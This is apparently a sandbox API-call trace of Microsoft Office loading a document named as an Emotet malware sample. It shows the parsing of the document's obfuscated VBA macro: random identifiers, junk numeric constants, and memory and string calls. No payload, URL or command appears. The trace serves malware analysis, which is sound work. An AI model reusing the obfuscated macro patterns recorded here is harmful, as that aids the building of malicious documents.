lpsz="*\\CC:\\Users\\aETAdzjz\\Desktop\\emotet_e2_2d2fa29185ad0f48f665f9c93cc8282d3eeca9c848543453cd223333ea2485b4_2019-03-15__142003.doc", cchLength=0x7e | out: lpsz="*\\cc:\\users\\aetadzjz\\desktop\\emotet_e2_2d2fa29185ad0f48f665f9c93cc8282d3eeca9c848543453cd223333ea2485b4_2019-03-15__142003.doc") returned 0x7e [0067.900] IMalloc:Alloc (This=0x7fefec05380, cb=0xfe) returned 0xaf54180 [0067.900] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\cc:\\users\\aetadzjz\\desktop\\emotet_e2_2d2fa29185ad0f48f665f9c93cc8282d3eeca9c848543453cd223333ea2485b4_2019-03-15__142003.doc", cchWideChar=127, lpMultiByteStr=0xaf54180, cbMultiByte=254, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\cc:\\users\\aetadzjz\\desktop\\emotet_e2_2d2fa29185ad0f48f665f9c93cc8282d3eeca9c848543453cd223333ea2485b4_2019-03-15__142003.doc", lpUsedDefaultChar=0x0) returned 127 [0067.900] IMalloc:Free (This=0x7fefec05380, pv=0xaf54180) [0067.901] _wcsicmp (_String1="*\\CC:\\Users\\aETAdzjz\\Desktop\\emotet_e2_2d2fa29185ad0f48f665f9c93cc8282d3eeca9c848543453cd223333ea2485b4_2019-03-15__142003.doc", _String2="*\\CC:\\Users\\aETAdzjz\\Desktop\\emotet_e2_2d2fa29185ad0f48f665f9c93cc8282d3eeca9c848543453cd223333ea2485b4_2019-03-15__142003.doc") returned 0 [0067.901] CExposedDocFile::AddRef () returned 0x5 [0067.901] CExposedDocFile::AddRef () returned 0x6 [0067.901] CExposedDocFile::OpenStream () returned 0x0 [0067.901] CExposedDocFile::Release () returned 0x5 [0067.901] CExposedStream::Seek () returned 0x0 [0067.901] IMalloc:Alloc (This=0x7fefec05380, cb=0x688) returned 0xafd2e30 [0067.901] IMalloc:Alloc (This=0x7fefec05380, cb=0x80) returned 0xaf60bb0 [0067.901] IMalloc:Alloc (This=0x7fefec05380, cb=0x640) returned 0xafd34c0 [0067.901] IMalloc:Alloc (This=0x7fefec05380, cb=0x20) returned 0x682e4c0 [0067.901] IMalloc:Alloc (This=0x7fefec05380, cb=0x0) returned 0x6a598b0 [0067.901] IMalloc:Alloc (This=0x7fefec05380, cb=0x0) returned 0x6a598c0 [0067.901] IMalloc:Alloc (This=0x7fefec05380, cb=0x20) returned 0x682e490 [0067.901] IMalloc:Alloc (This=0x7fefec05380, cb=0x80) returned 0xaf60cd0 [0067.901] CExposedStream::AddRef () returned 0x2 [0067.901] CExposedStream::Read () returned 0x0 [0067.901] CExposedStream::AddRef () returned 0x3 [0067.901] CExposedStream::Release () returned 0x2 [0067.901] IMalloc:Alloc (This=0x7fefec05380, cb=0x2ee0) returned 0xafbfec0 [0067.901] CExposedStream::Read () returned 0x0 [0067.901] CExposedStream::Read () returned 0x0 [0067.901] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_Evaluate") returned 0x10d918 [0067.901] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Attribute") returned 0x10ed01 [0067.901] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Name") returned 0x10e2ff [0067.901] IMalloc:Alloc (This=0x7fefec05380, cb=0x7) returned 0x6a598d0 [0067.901] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x258d280 [0067.901] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a598d0, cbMultiByte=7, lpWideCharStr=0x258d280, cchWideChar=7 | out: lpWideCharStr="GB_C_A") returned 7 [0067.901] IMalloc:Free (This=0x7fefec05380, pv=0x6a598d0) [0067.901] IMalloc:Free (This=0x7fefec05380, pv=0x258d280) [0067.901] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Function") returned 0x107810 [0067.901] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="tDAAA44k") returned 0x10e29c [0067.901] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba1586, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0067.901] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0067.901] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="KUAAC4G") returned 0x10c088 [0067.901] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="RBcQBU") returned 0x104b1b [0067.901] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0067.902] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VxU_oZ") returned 0x1062ba [0067.902] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.902] VarI4FromStr (in: strIn="478015896", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.902] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="WUAQDc") returned 0x10ef31 [0067.902] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="kGXQDB") returned 0x10bd4c [0067.902] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="RcxU1Qo") returned 0x101f73 [0067.902] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0067.902] VarI4FromStr (in: strIn="16681942", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.902] VarI4FromStr (in: strIn="650045611", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.902] VarI4FromStr (in: strIn="464362019", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.902] VarI4FromStr (in: strIn="379280562", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.902] VarI4FromStr (in: strIn="625626926", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.902] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="vB1CX1x") returned 0x10a38e [0067.902] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Tan") returned 0x10d82d [0067.902] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="rX_AAX") returned 0x101e55 [0067.902] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.902] VarI4FromStr (in: strIn="347232076", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.902] VarI4FromStr (in: strIn="44176674", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.902] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Oct") returned 0x10bdc0 [0067.902] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="AQZ_1U") returned 0x1060e5 [0067.902] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Hex") returned 0x10989f [0067.902] VarI4FromStr (in: strIn="665521372", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.902] VarI4FromStr (in: strIn="520577342", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.902] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Oct") returned 0x10bdc0 [0067.902] VarI4FromStr (in: strIn="325018102", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.902] VarI4FromStr (in: strIn="125372376", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.902] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sqr") returned 0x10d528 [0067.902] VarI4FromStr (in: strIn="631227122", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.903] IMalloc:Realloc (This=0x7fefec05380, pv=0xaf60bb0, cb=0x120) returned 0xaf59a40 [0067.903] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="IDA4ZA") returned 0x107fe2 [0067.903] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.903] VarI4FromStr (in: strIn="405306484", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.903] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="qAXQBAk") returned 0x10ec93 [0067.903] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0067.903] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0067.903] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0067.903] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="vAAAGBAD") returned 0x101ae6 [0067.903] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="JBUBXxw") returned 0x107ab2 [0067.903] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="lZ1DA_AU", cchCount1=-1, lpString2="JBUBXxw", cchCount2=-1) returned 3 [0067.903] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0067.903] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="TAkAB1") returned 0x10be73 [0067.903] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.903] VarI4FromStr (in: strIn="588197469", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.903] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Qww1DU") returned 0x109bd3 [0067.903] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="wZAAABA") returned 0x10dedc [0067.903] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="tAUDQ4Q") returned 0x1032b6 [0067.903] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0067.903] VarI4FromStr (in: strIn="92859086", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.903] VarI4FromStr (in: strIn="77004421", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.903] VarI4FromStr (in: strIn="379466402", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.903] VarI4FromStr (in: strIn="787051035", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.903] VarI4FromStr (in: strIn="509615377", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.903] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="FZxxAAoX") returned 0x10b3a9 [0067.903] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Tan") returned 0x10d82d [0067.903] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ikAc_kBU") returned 0x106c42 [0067.904] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.904] VarI4FromStr (in: strIn="728506815", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.904] VarI4FromStr (in: strIn="303114699", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.904] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Oct") returned 0x10bdc0 [0067.904] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="woA4Uw1x") returned 0x1047b7 [0067.904] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Hex") returned 0x10989f [0067.904] VarI4FromStr (in: strIn="963155822", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.904] VarI4FromStr (in: strIn="72442312", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.904] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Oct") returned 0x10bdc0 [0067.904] VarI4FromStr (in: strIn="451750825", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.904] VarI4FromStr (in: strIn="712765318", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.904] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sqr") returned 0x10d528 [0067.904] VarI4FromStr (in: strIn="550121627", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.904] IMalloc:Realloc (This=0x7fefec05380, pv=0xaf59a40, cb=0x240) returned 0x6a18760 [0067.904] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="rABGUQ") returned 0x10c0f0 [0067.904] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.904] VarI4FromStr (in: strIn="592714379", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.904] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="sQ4CADQ") returned 0x107de9 [0067.904] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0067.904] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0067.904] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0067.904] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="mwDcAAc") returned 0x108eef [0067.904] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="zU1Q4wU") returned 0x105686 [0067.904] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0067.904] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="NAAAAAA") returned 0x10b8ea [0067.904] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.904] VarI4FromStr (in: strIn="502078488", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.905] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="nBkwD1D") returned 0x10c797 [0067.905] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="BABAcA") returned 0x10330f [0067.905] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="LAAcAAD") returned 0x10c4c7 [0067.905] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.905] VarI4FromStr (in: strIn="493042399", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.905] VarI4FromStr (in: strIn="185914834", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.905] VarI4FromStr (in: strIn="390629662", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.905] VarI4FromStr (in: strIn="686072502", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.905] VarI4FromStr (in: strIn="312595101", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.905] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="bAUA4BXA") returned 0x104a1c [0067.905] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Tan") returned 0x10d82d [0067.905] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="FXUAU4") returned 0x105822 [0067.905] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.905] VarI4FromStr (in: strIn="189416696", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.905] VarI4FromStr (in: strIn="895871439", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.905] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Oct") returned 0x10bdc0 [0067.905] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="BBC4AUx") returned 0x10ff2b [0067.905] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Hex") returned 0x10989f [0067.905] VarI4FromStr (in: strIn="716900501", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.905] VarI4FromStr (in: strIn="175926299", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.905] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Oct") returned 0x10bdc0 [0067.905] VarI4FromStr (in: strIn="907523123", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.905] VarI4FromStr (in: strIn="664869537", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.905] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sqr") returned 0x10d528 [0067.905] VarI4FromStr (in: strIn="819792384", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.905] IMalloc:Realloc (This=0x7fefec05380, pv=0x6a18760, cb=0x480) returned 0x6754f90 [0067.906] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="jZQwQB") returned 0x102fa6 [0067.906] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.906] VarI4FromStr (in: strIn="226782813", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.906] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="IokQBA") returned 0x1014ff [0067.906] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0067.906] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0067.906] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0067.906] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="zc1kccUQ") returned 0x10c75f [0067.906] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="lB1ZGQox") returned 0x10926b [0067.906] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0067.906] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="hXkADwA") returned 0x100a3e [0067.906] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.906] VarI4FromStr (in: strIn="893424597", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.906] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="YAxQACkB") returned 0x10a789 [0067.906] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="QwDUAAA") returned 0x107408 [0067.906] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="rAwUDDA") returned 0x1031d8 [0067.906] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.906] VarI4FromStr (in: strIn="880120293", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.906] VarI4FromStr (in: strIn="22348326", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.906] VarI4FromStr (in: strIn="28773395", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.906] VarI4FromStr (in: strIn="739906536", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.906] VarI4FromStr (in: strIn="702600113", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.906] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="TU1QZB") returned 0x106a16 [0067.906] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Tan") returned 0x10d82d [0067.906] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="BADAUBU") returned 0x10ec38 [0067.906] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.906] VarI4FromStr (in: strIn="439586829", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.906] VarI4FromStr (in: strIn="40732924", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.907] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Oct") returned 0x10bdc0 [0067.907] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="P_oAAG") returned 0x10939a [0067.907] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Hex") returned 0x10989f [0067.907] VarI4FromStr (in: strIn="421757805", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.907] VarI4FromStr (in: strIn="902009626", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.907] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Oct") returned 0x10bdc0 [0067.907] VarI4FromStr (in: strIn="79585006", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.907] VarI4FromStr (in: strIn="105216281", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.907] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sqr") returned 0x10d528 [0067.907] VarI4FromStr (in: strIn="804308083", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.907] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="acc1QQ1A") returned 0x10c122 [0067.907] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.907] VarI4FromStr (in: strIn="885186045", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.907] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="HA1CAZBc") returned 0x10c7fb [0067.907] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="jA1AAA", cchCount1=-1, lpString2="HA1CAZBc", cchCount2=-1) returned 3 [0067.907] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0067.907] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0067.907] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0067.907] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CBoADQ") returned 0x10e5ca [0067.907] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="LDGAAAAc") returned 0x10bc40 [0067.907] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0067.907] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="vA4B4CD") returned 0x10bf24 [0067.907] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.907] VarI4FromStr (in: strIn="339034841", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.907] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="RUAUDA") returned 0x10a9bb [0067.907] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="jAAADAxU") returned 0x10cfb8 [0067.907] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="XwCQAoUA") returned 0x10228c [0067.907] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.908] VarI4FromStr (in: strIn="643445441", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.908] VarI4FromStr (in: strIn="198465777", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.908] VarI4FromStr (in: strIn="251173278", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.908] VarI4FromStr (in: strIn="924703823", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.908] VarI4FromStr (in: strIn="171374349", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.908] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="f4BAcA") returned 0x1024f7 [0067.908] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Tan") returned 0x10d82d [0067.908] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="UAAQAXAB") returned 0x100c49 [0067.908] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.908] VarI4FromStr (in: strIn="213218313", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.908] VarI4FromStr (in: strIn="795215947", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.908] 